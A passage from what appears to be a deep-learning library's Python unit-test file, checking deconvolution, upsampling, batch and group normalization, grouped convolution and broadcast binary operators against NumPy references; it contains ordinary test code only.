input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@with_seed()
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(24, 2), (24, 3, 4),
(24, 8, 4, 5), (24, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
